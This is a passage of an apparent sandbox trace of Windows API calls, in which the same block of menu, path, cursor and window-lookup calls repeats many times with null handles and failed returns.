[0027.441] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.441] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.441] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.441] GetStockObject (i=6) returned 0x1b00018 [0027.441] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.441] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.441] PathFileExistsW (pszPath=0x0) returned 0 [0027.441] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.441] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.441] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.441] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.441] GetMenu (hWnd=0x0) returned 0x0 [0027.441] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x113) returned -1 [0027.441] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.441] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.441] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.441] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.441] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.441] GetStockObject (i=6) returned 0x1b00018 [0027.441] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.441] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.442] PathFileExistsW (pszPath=0x0) returned 0 [0027.442] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.442] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.442] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.442] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.442] GetMenu (hWnd=0x0) returned 0x0 [0027.442] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.442] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.442] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.442] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.442] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.442] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.442] GetStockObject (i=6) returned 0x1b00018 [0027.442] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.442] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.442] PathFileExistsW (pszPath=0x0) returned 0 [0027.442] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.442] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.442] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.442] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.442] GetMenu (hWnd=0x0) returned 0x0 [0027.442] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.442] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.442] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.442] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.442] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.442] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.442] GetStockObject (i=6) returned 0x1b00018 [0027.442] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.442] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.442] PathFileExistsW (pszPath=0x0) returned 0 [0027.442] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.442] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.443] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.443] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.443] GetMenu (hWnd=0x0) returned 0x0 [0027.443] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.443] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.443] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.443] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.443] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.443] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.443] GetStockObject (i=6) returned 0x1b00018 [0027.443] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.443] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.443] PathFileExistsW (pszPath=0x0) returned 0 [0027.443] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.443] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.443] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.443] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.443] GetMenu (hWnd=0x0) returned 0x0 [0027.443] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.443] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.443] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.443] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.443] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.443] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.443] GetStockObject (i=6) returned 0x1b00018 [0027.443] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.443] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.443] PathFileExistsW (pszPath=0x0) returned 0 [0027.443] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.443] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.443] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.443] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.443] GetMenu (hWnd=0x0) returned 0x0 [0027.444] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x79) returned -1 [0027.444] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.444] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.444] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.444] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.444] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.444] GetStockObject (i=6) returned 0x1b00018 [0027.444] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.444] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.444] PathFileExistsW (pszPath=0x0) returned 0 [0027.444] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.444] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.444] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.444] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.444] GetMenu (hWnd=0x0) returned 0x0 [0027.444] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.444] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.444] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.444] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.444] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.444] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.444] GetStockObject (i=6) returned 0x1b00018 [0027.444] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.444] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.444] PathFileExistsW (pszPath=0x0) returned 0 [0027.444] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.444] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.444] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.444] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.444] GetMenu (hWnd=0x0) returned 0x0 [0027.444] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.444] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.444] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.445] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.445] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.445] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.445] GetStockObject (i=6) returned 0x1b00018 [0027.445] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.445] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.445] PathFileExistsW (pszPath=0x0) returned 0 [0027.445] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.445] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.445] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.445] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.445] GetMenu (hWnd=0x0) returned 0x0 [0027.445] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.445] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.445] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.445] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.445] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.445] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.445] GetStockObject (i=6) returned 0x1b00018 [0027.445] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.445] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.445] PathFileExistsW (pszPath=0x0) returned 0 [0027.445] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.445] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.445] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.445] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.445] GetMenu (hWnd=0x0) returned 0x0 [0027.445] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.445] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.445] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.445] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.445] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.445] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.446] GetStockObject (i=6) returned 0x1b00018 [0027.446] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.446] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.446] PathFileExistsW (pszPath=0x0) returned 0 [0027.446] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.446] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.446] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.446] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.446] GetMenu (hWnd=0x0) returned 0x0 [0027.446] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xf4) returned -1 [0027.446] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.446] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.446] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.446] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.446] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.446] GetStockObject (i=6) returned 0x1b00018 [0027.446] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.446] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.446] PathFileExistsW (pszPath=0x0) returned 0 [0027.446] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.446] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.446] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.446] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.446] GetMenu (hWnd=0x0) returned 0x0 [0027.446] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.446] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.446] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.446] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.446] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.446] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.446] GetStockObject (i=6) returned 0x1b00018 [0027.446] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.446] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.446] PathFileExistsW (pszPath=0x0) returned 0 [0027.447] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.447] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.447] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.447] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.447] GetMenu (hWnd=0x0) returned 0x0 [0027.447] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.447] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.447] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.447] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.447] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.447] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.447] GetStockObject (i=6) returned 0x1b00018 [0027.447] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.447] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.447] PathFileExistsW (pszPath=0x0) returned 0 [0027.447] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.447] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.447] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.447] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.447] GetMenu (hWnd=0x0) returned 0x0 [0027.447] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.447] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.447] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.447] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.447] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.447] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.447] GetStockObject (i=6) returned 0x1b00018 [0027.447] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.447] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.447] PathFileExistsW (pszPath=0x0) returned 0 [0027.447] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.447] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.447] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.447] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.448] GetMenu (hWnd=0x0) returned 0x0 [0027.448] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.448] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.448] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.448] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.448] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.448] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.448] GetStockObject (i=6) returned 0x1b00018 [0027.448] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.448] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.448] PathFileExistsW (pszPath=0x0) returned 0 [0027.448] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.448] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.448] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.448] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.448] GetMenu (hWnd=0x0) returned 0x0 [0027.448] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x92) returned -1 [0027.448] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.448] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.448] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.448] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.448] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.448] GetStockObject (i=6) returned 0x1b00018 [0027.448] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.448] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.448] PathFileExistsW (pszPath=0x0) returned 0 [0027.448] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.448] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.448] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.448] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.448] GetMenu (hWnd=0x0) returned 0x0 [0027.448] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.448] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.449] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.449] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.449] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.449] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.449] GetStockObject (i=6) returned 0x1b00018 [0027.449] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.449] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.449] PathFileExistsW (pszPath=0x0) returned 0 [0027.449] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.449] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.449] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.449] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.449] GetMenu (hWnd=0x0) returned 0x0 [0027.449] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.449] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.449] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.449] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.449] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.449] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.449] GetStockObject (i=6) returned 0x1b00018 [0027.449] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.449] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.449] PathFileExistsW (pszPath=0x0) returned 0 [0027.449] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.449] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.449] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.449] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.449] GetMenu (hWnd=0x0) returned 0x0 [0027.449] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.449] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.449] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.449] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.450] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.450] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.450] GetStockObject (i=6) returned 0x1b00018 [0027.450] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.450] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.450] PathFileExistsW (pszPath=0x0) returned 0 [0027.450] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.450] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.450] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.450] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.450] GetMenu (hWnd=0x0) returned 0x0 